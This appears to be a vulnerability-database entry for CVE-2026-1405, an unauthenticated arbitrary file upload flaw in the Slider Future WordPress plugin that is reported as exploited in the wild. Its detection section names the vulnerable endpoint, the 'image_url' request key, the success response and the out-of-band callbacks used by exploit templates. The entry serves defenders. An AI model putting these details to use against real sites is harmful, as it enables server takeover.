cbcvebase.
CVE-2026-1405
published 2026-02-19

CVE-2026-1405: The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'slider_future_handle_image_upload'…

PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.18%
86.4th percentile
The Slider Future plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'slider_future_handle_image_upload' function in all versions up to, and including, 1.0.5. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

Affected

1 ranges
VendorProductVersion rangeFixed in
franchidesignslider_future<= 1.0.5

Detection & IOCsextracted from sources · hover to see the quote

url/wp-json/slider-future/v1/upload-image/
  • Detect unauthenticated POST requests to the Slider Future upload endpoint /wp-json/slider-future/v1/upload-image/ with a JSON body containing an 'image_url' key — no authentication headers required.
  • A successful exploit response will return HTTP 200 with Content-Type application/json and a body containing both 'url' and 'wp-content', indicating a file was fetched and stored under the WordPress uploads directory.
  • The vulnerable function is 'slider_future_handle_image_upload' — monitor for this function name in WordPress debug logs or stack traces as evidence of exploitation attempts.
  • Out-of-band interaction (HTTP or DNS callback) via interactsh/OAST is used by exploit templates to confirm SSRF-assisted file fetch; monitor for unexpected outbound HTTP/DNS from the WordPress server triggered by this endpoint.
  • ·Vulnerability affects all versions up to and including 1.0.5 of the Slider Future WordPress plugin; versions beyond 1.0.5 are not affected.
  • ·Exploitation requires no authentication whatsoever — any unauthenticated network attacker can trigger the upload endpoint.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.